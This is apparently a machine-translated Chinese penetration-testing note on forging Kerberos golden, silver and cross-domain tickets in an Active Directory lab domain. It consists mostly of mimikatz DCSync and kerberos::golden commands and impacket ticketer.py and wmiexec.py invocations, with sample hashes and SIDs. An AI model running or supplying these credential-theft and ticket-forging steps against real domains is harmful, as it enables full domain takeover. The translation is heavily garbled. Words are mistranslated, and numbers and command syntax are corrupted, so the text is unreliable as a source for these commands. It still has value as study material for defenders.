.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
忘记账单
金笔记
Goldenticket
https://www.se7ensec.cn/2021/10/20/20/%E5%9f%9f%E6%B8%97%E9%E9%80%80%8F-KERBEROS%E5%9F%9F%E8%E8% A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#%E9%BB%84%E9%E9%87%87%91%E7%E7%A5%A5%A8%A8%E6%8DD%AE
简介
金票(以下称为金票)是伪造的TGT(票务票),因为只要有高授权的TGT,就可以将其发送到TGS进行任何服务的TGS。可以说,有了黄金票,该域中的权威最高。
制作金票的条件
1。域名
2。域的SID值
3。域的KRBTGT帐户密码哈希
4。锻造用户名可以是任何
使用过程
mimikatz
金票的产生需要Krbtgt的哈希值。您可以通过Mimikatz中的命令获得KRBTGT的值。
1LSADUMP:3:DCSYNC /OOWA2013.ROOTKIT.org /user:KrBtgt获取Krbtgt Hash,然后使用Kerberos: -Golden在Mimikatz中的功能产生Golden.kiribi,是成功的成功。
/用户:锻造用户名
/域:域名
/sid:SID值,请注意,最后一个值- 以下值/KRBTGT:KRBTGT HASH值
/ptt:这意味着传递票务攻击,该票证将生成的机票导入内存,并且在使用之前也可以使用/票证出口。
12mimikatz.exe 'kerberos:golden /user:administrator /domain:rootkit.org /sid:S-1-5-21-3759881954-2993291187-3577547808 /krbtgt3360c3d5042c67ef5f461d0ba6ecd9e449 /ptt'Exitklist /kerberos:List可以成功地通过DIR访问域控制的共享文件夹。
1dir \\ owa2013.rootkit.org \ c $
爆炸
123456781。清除票证klist klist purge2。制作ccache文件python ticketer.py -nthash C3D5042C67EF5F461D0BA6ECDD9EA449 -DOMAIN-SID SID SID SID SID SID SID SID SID SID SID SID SID更改环境变量设置krb5ccname=abtrisyator.ccache/export krb5ccname=indercanceator.ccache4。验证结果python wmiexec.py rootkit.org/administrator@owa2013 -K -no-pass
银笔记
Silvertickets
https://www.se7ensec.cn/2021/10/20/20/%E5%9f%9f%E6%B8%97%E9%E9%80%80%8F-KERBEROS%E5%9F%9F%E8%E8% A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#%E7%99%BD%E9%E9%93%B6%E7%A5%A5%A5%A8%A8%E6%8DD%AE
需要使用什么服务?在这里查看攻击者如何使用Kerberos银票来利用系统3https://ADSECURITY.org/?p=2011
服务类型
服务银票
WMI
主机,RPCSS
powershell远程
主机,HTTP(WSMAN,RPCSS)
Winrm
主机,http
计划的任务
主持人
Windows文件共享(CIF)
CIFS
LDAP操作包括Mimikatz DCSync
LDAP
Windows远程服务器管理工具
RPCSS,LDAP,CIFS
简介
银票(以下称为银纸币)是伪造的(服务票),因为TGT限于PAC。
客户授权的服务(通过SID的值),因此钞票只能访问指定的服务。
制作银笔记的条件
1。域名
2。域SID
3。完全合格的域名目标服务器的完全合格的域名,即带有主机名和域名的名称。)
4。可用服务(在目标服务器上运行的Kerberos服务,服务主名称类型,例如CIFS,HTTP,MSSQL等)
5。服务帐户的NTLM哈希(如果它是域控制器计算机帐户,则意味着DC已被删除)
6。需要伪造的用户名可以是任何,以下是银
使用过程
mimikatz
首先,我们需要知道服务帐户哈希的密码。在这里,我们还使用域控件作为示例(请注意,在此不使用管理员帐户的哈希,但OWA2013 $)
参数描述:
/域:当前域名
/sid:SID值,像金票一样,请上一部分
/目标:目标主机,这是OWA2013.ROOTKIT.org
/服务:服务名称,您需要在此处访问共享文件,因此是CIFS
/rc4:NTLM服务帐户的哈希值(OWA2013 $)
/用户:锻造用户名
/ptt:这意味着传递票务攻击,该票证将生成的机票导入内存,并且在使用之前也可以使用/票证出口。
使用kerberos:ptt导入
1234567891。 /TARGET:OWA2013.ROOTKIT.org /service:Cifs /rc4:dd2162e8606006006dcca0e29b7819721a /user33:silver /ptt'exitklistdir $ 2.ROOTKIT.OROTKIT.ROOTKIT.ROOTKIT.ROOTKIT.ROOTKIT.ROOTKIT.ROOTKIT.ROOTKIT.ROOTKIT。锻造的LDAP服务权限mimikatz'Kerberos:3:Golden /domain:Rootkit.org /sid:s-1-5-21-37598881954-299999999999993293291187-3577578080808080808083333333333333333333333333333333333333333333333333333333333333333333333333333333633333量表。 /service:ldap /rc4:ddddd2162e8606006dcca0e29b7819721a /user:silver /ptt'exitklistmikikikatz'lsadump333333:dcsync /dcssync /dcssync /dcssync /dcssync /d.ga.ga.gaafa.gaafa.gaafa.arotklistmikikatz /domain:rootkit.org /user:krbtgt' exit.
爆炸
123456781. Forge cifs service permissions python3 ticketer.py -nthash ddd2162e8606006dcca0e29b7819721a -domain-sid S-1-5-21-3759881954-29993291187-3577547808- domain rootkit.org -dc-ip 192.168.3.144 -spn cifs/owaa2013.Rootkit.org silver2。 Forge LDAP service permissions python3 ticketer.py -nthash ddd2162e8606006dcca0e29b7819721a -domain-sid S-1-5-21-3759881954-2993291187-3577547808 -domain rootkit.org -dc-ip 192.168.3.144 -spn ldap/owa2013.rootkit.org silverset krb5ccname=silver.ccace/export krb5ccname=silver.ccachepython wmiexec.py -k owaa2y2013.Rootkit.org 3
增强版本的金音符
-1
增强式Golden门票
-1
域树和域森林
-1010-110-110-110-110
普通金票的限制
11门票,以便可以获得域控制权限,并且可以访问域中其他主机的任何服务。
但是,不能在域上使用普通的金票,这意味着金票的权限仅限于当前域。
企业管理员组
news.rootkit.org和dev.rootkit.org是rootkit.org的子域,这三个域形成了一个域树。
同样,test.org也是一个单独的域树。将两个域树rootkit.org和test.org合并为被称为域森林。
域名ADMINS组
根域和其他域之间最大的区别是根域对整个域森林具有控制权。
该域基于企业管理员组实现此类许可部门。
使用过程
Enterpriseadmins组是该域中的一组用户,仅存在于森林中的根域中。该组的成员是rootkit.org中的管理员用户(不是本地管理员,而是域中的管理员)对域具有完整的管理控制。
在rootkit.org的域控制上的企业管理员组为519。
mimikatz
子域中不存在Enterpriseadmins组。子域中具有最高特权的小组是域管理组。
news.rootkit.org此子域中的管理员用户,该管理员在当前域中具有最高的权限。
参考
010-1010普通金音符仅限于当前域。 2015年,来自中国黑帽子的研究人员提出了增强的黄金音符版本,这些音符突破了域限制。
迁移期间LDAP库的Sidhistory属性中保存的先前域的SID值是通过制作跨域金票来制作的。
如果您知道根域的SID,则可以使用Mimikatz通过子域的KRBTGT的哈希值来使用Enterpriseadmins组权限(域名森林中最高特权)创建票。
然后再生一张包含Mimikatz根域SID的新金票
1mimikatz'Kerberos:Golden /admin:AdMinistrator /domain:news.rootkit.org` /sid:SID /sidssiD /sids:ROOT域名/endin:600 /renewmax:10080 /ptt'退出参考:3https://ADSecurity.org/?p=1640
startoffffset和endin分别表示偏移和长度,而Renewmax表示生成的票证的最大时间。
请注意,您不知道root domain rootkit.org的密码哈希,并在subdomain news.rootkit.org中使用KRBTGT的密码哈希。
然后,您可以通过DIR访问OWA2013.ROOTKIT.org的共享文件夹。目前,这张机票控制了整个域名森林。
010-1010 https://github.com/uknowsec/active-directory-pentest-notes